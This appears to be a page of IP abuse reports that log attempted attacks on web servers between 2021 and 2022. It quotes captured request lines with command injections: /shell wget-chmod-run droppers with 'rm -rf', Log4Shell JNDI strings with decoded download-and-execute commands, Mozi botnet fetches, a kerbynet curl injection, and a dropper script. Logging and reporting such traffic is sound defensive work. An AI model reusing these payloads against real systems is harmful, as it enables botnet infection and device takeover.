π³π±
146.0.75.242
17 Mar 2022
[17/Mar/2022:21:47:40 +0200] "GET /shell?cd+/tmp;+wget+http:/\\/146.0.75.242/YourName/BinName.arm;+c ...
show more
[17/Mar/2022:21:47:40 +0200] "GET /shell?cd+/tmp;+wget+http:/\\/146.0.75.242/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm"
show less
Exploited Host
Web App Attack
πΊπΈ
209.141.33.141
17 Mar 2022
[17/Mar/2022:07:15:36 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ jswl.jdaili.xyz/jaws;sh+/tmp/jaws"
...
show more
[17/Mar/2022:07:15:36 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ jswl.jdaili.xyz/jaws;sh+/tmp/jaws"
Name: jswl.jdaili.xyz
Address: 209.141.33.141
show less
Exploited Host
Web App Attack
π·πΊ
62.122.97.50
12 Mar 2022
line50.vpn2.dmitrov.ru - - [12/Mar/2022:13:36:27 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+209.141.59 ...
show more
line50.vpn2.dmitrov.ru - - [12/Mar/2022:13:36:27 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+209.141.59.94/jaws;sh+/tmp/jaws
show less
Web App Attack
π·πΊ
217.114.43.95
11 Mar 2022
48291.vds.hosted-by.hshp.host - - [11/Mar/2022:09:39:14 +0200] "GET /spog/welcome HTTP/1.1"
48291.v ...
show more
48291.vds.hosted-by.hshp.host - - [11/Mar/2022:09:39:14 +0200] "GET /spog/welcome HTTP/1.1"
48291.vds.hosted-by.hshp.host - - [11/Mar/2022:09:39:15 +0200] "GET /cgi-bin/welcome HTTP/1.1"
show less
Web App Attack
π·πΊ
46.148.224.27
11 Mar 2022
[Fri Mar 11 20:27:07 2022] referer: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}/ ...
show more
[Fri Mar 11 20:27:07 2022] referer: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//82.148.6.244:2420/TomcatBypass/Command/Base64/d2dldCA0Ni4xNDguMjI0LjI3L3dnZXQuc2g7IGNobW9kICt4IHdnZXQuc2g7IC4vd2dldC5zaDsgcm0gLXJmIHdnZXQuc2g=}')
base64 decoded
wget 46.148.224.27/wget.sh; chmod +x wget.sh; ./wget.sh; rm -rf wget.sh
show less
Web App Attack
π·πΊ
194.58.96.48
10 Mar 2022
[10/Mar/2022:07:18:12 +0200] "GET /radio.php
Web App Attack
π«π·
82.64.2.141
08 Mar 2022
Scam to fish passwords or Probably exploited host, D-link ShareCenter answers from the ip
82-64-2-1 ...
show more
Scam to fish passwords or Probably exploited host, D-link ShareCenter answers from the ip
82-64-2-141.subs.proxad.net - - [08/Mar/2022:07:26:26 +0200] "GET / HTTP/1.0"
show less
Exploited Host
π³π±
185.28.37.234
04 Mar 2022
menuhalf.com - - [04/Mar/2022:21:25:08 +0200] "GET /$%7Bjndi:ldap://185.203.118.200:1389/Exploit%7D ...
show more
menuhalf.com - - [04/Mar/2022:21:25:08 +0200] "GET /$%7Bjndi:ldap://185.203.118.200:1389/Exploit%7D HTTP/1.1"
show less
Web App Attack
πΊπΈ
198.46.233.60
04 Mar 2022
[client 198.46.233.60] client denied by server configuration: /srv/www/htdocs/boaform/admin/formLogi ...
show more
[client 198.46.233.60] client denied by server configuration: /srv/www/htdocs/boaform/admin/formLogin
show less
Web App Attack
π·πΊ
46.148.224.27
03 Mar 2022
Thu Mar 03 20:02:07 2022]l}dap${env:NaN:-:}//205.185.114.157:2420/TomcatBypass/Command/Base64/d2dldC ...
show more
Thu Mar 03 20:02:07 2022]l}dap${env:NaN:-:}//205.185.114.157:2420/TomcatBypass/Command/Base64/d2dldCA0Ni4xNDguMjI0LjI3L3dnZXQuc2g7IGNobW9kICt4IHdnZXQuc2g7IC4vd2dldC5zaDsgcm0gLXJmIHdnZXQuc2g=}')
decoded: wget 46.148.224.27/wget.sh; chmod +x wget.sh; ./wget.sh; rm -rf wget.sh
show less
Web App Attack
π³π±
2.56.57.7
27 Feb 2022
37.143.147.248 - - [27/Feb/2022:06:09:20 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ http://2.56.57.7/ ...
show more
37.143.147.248 - - [27/Feb/2022:06:09:20 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ http://2.56.57.7/.s4y/arm;sh+/tmp/arm"
ELF Header:
Magic: 7f 45 4c 46 01 01 01 61 00 00 00 00 00 00 00 00
Class: ELF32
Data: 2's complement, little endian
Version: 1 (current)
OS/ABI: ARM
ABI Version: 0
Type: EXEC (Executable file)
Machine: ARM
Version: 0x1
00008780 50 ... |PROT_EXEC|PROT_W|
00008790 52 ... |RITE failed.....|
000087a0 24 ... |$Info: This file|
000087b0 20 ... | is packed with |
000087c0 74 ... |the UPX executab|
show less
Exploited Host
Web App Attack
IoT Targeted
π³π±
2.56.57.7
26 Feb 2022
http://2.56.57.7/.s4y/arm
[26/Feb/2022:07:22:57 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ http:// ...
show more
http://2.56.57.7/.s4y/arm
[26/Feb/2022:07:22:57 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ http://2.56.57.7/.s4y/arm;sh+/tmp/arm"
show less
Hacking
Exploited Host
Web App Attack
IoT Targeted
π¨π³
182.123.227.117
25 Jan 2022
182.123.227.117 - - [25/Jan/2022:21:22:07 +0200] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Moz ...
show more
182.123.227.117 - - [25/Jan/2022:21:22:07 +0200] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0"
show less
Port Scan
Web App Attack
π³π±
37.0.8.217
16 Dec 2021
106.13.90.51 - - [16/Dec/2021:21:18:08 +0200] "GET /shell?cd+/tmp;+wget+http:/\\/37.0.8.217/AkitaXss ...
show more
106.13.90.51 - - [16/Dec/2021:21:18:08 +0200] "GET /shell?cd+/tmp;+wget+http:/\\/37.0.8.217/AkitaXss/bin.arm;+chmod+777+bin.arm;+./bin.arm Jaws.Selfrep;rm+-rf+bin.arm"
show less
Web App Attack
π¨π³
222.186.136.150
08 Nov 2021
222.186.19.235 - - [07/Nov/2021:00:13:27 +0200] "GET http://fuwu.sogou.com/404/index.html HTTP/1.1"
Web App Attack
πΊπΈ
64.17.27.51
08 Nov 2021
64.17.27.51 - - [07/Nov/2021:06:06:19 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 209.141.41.11/jaws;s ...
show more
64.17.27.51 - - [07/Nov/2021:06:06:19 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 209.141.41.11/jaws;sh+/tmp/jaws"
show less
Web App Attack
π·πΊ
45.155.204.227
08 Nov 2021
Web App Attack
π¨π³
27.115.124.43
06 Nov 2021
27.115.124.10 - - [06/Nov/2021:16:16:19 +0200] "\x16\x03\x01" 400 415
Web App Attack
π¨π¦
64.229.167.14
06 Nov 2021
64.229.167.14 - - [06/Nov/2021:16:30:41 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+205.185.120.207/jaw ...
show more
64.229.167.14 - - [06/Nov/2021:16:30:41 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+205.185.120.207/jaws;sh+/tmp/jaws HTTP/1.1" 301 636
show less
Web App Attack
SSH
45.14.149.244
22 May 2021
[21/May/2021:05:24:04 +0300] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+ ...
show more
[21/May/2021:05:24:04 +0300] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1"
hexdump -C
00017ad0 2f 00 00 00 20 48 54 54 50 2f 31 2e 31 0d 0a 55 |/... HTTP/1.1..U|
00017b10 3b 00 00 00 68 74 74 70 00 00 00 00 75 72 6c 3d |;...http....url=|
00025c60 74 61 63 6b 5f 61 70 70 5f 68 74 74 70 00 73 74 |tack_app_http.st|
00018f80 2f 70 72 6f 63 2f 73 74 61 74 00 00 2f 70 72 6f |/proc/stat../pro|
00018f90 63 2f 63 70 75 69 6e 66 6f 00 00 00 70 72 6f 63 |c/cpuinfo...proc|
00018fa0 65 73 73 6f 72 00 00 00 2f 73 79 73 2f 64 65 76 |essor.../sys/dev|
00018fb0 69 63 65 73 2f 73 79 73 74 65 6d 2f 63 70 75 00 |ices/system/cpu.|
00018fc0 00 3a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 |.:..............|
00018fd0 00 00 00 00 00 00 00 00 00 00 00 00 2f 64 65 76 |............/dev|
00018fe0 2f 6e 75 6c 6c 00 00 00 00 00 00 00 00 00 00 00 |/null...........|
show less
Hacking
Web App Attack
5.206.227.228
04 May 2021
[04/May/2021:20:39:12 +0300] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%2 ...
show more
[04/May/2021:20:39:12 +0300] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22
show less
Web App Attack
89.248.165.182
02 May 2021
89.248.165.182 - - [01/May/2021:05:01:33 +0300] "GET /level/15/exec/-/sh/run/CR HTTP/1.1" 302 4276
Web App Attack
31.210.21.239
30 Apr 2021
45.118.216.217 - - [30/Apr/2021:06:16:43 +0300] "GET /shell?cd+/tmp;rm+-rf+*;wget+ http://31.210.21. ...
show more
45.118.216.217 - - [30/Apr/2021:06:16:43 +0300] "GET /shell?cd+/tmp;rm+-rf+*;wget+ http://31.210.21.239/bins.sh;chmod+777+/tmp/bins.sh;sh+/tmp/bins.sh"
contains:
-e #!/bin/bash
...
-e cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://31.210.21.239/bins/apache2; chmod +x apache2; ./apache2; rm -rf apache2
-e cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://31.210.21.239/bins/telnetd; chmod +x telnetd; ./telnetd; rm -rf telnetd
show less
Web App Attack
61.52.75.143
22 Apr 2021
"27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink ...
show more
"27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0"
show less
Web App Attack
207.118.183.151
14 Mar 2021
207.118.183.151 - - [14/Mar/2021:12:08:00 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ debes.venus.lol/ ...
show more
207.118.183.151 - - [14/Mar/2021:12:08:00 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ debes.venus.lol/jaws;sh+/tmp/jaws" 400 415
show less
Web App Attack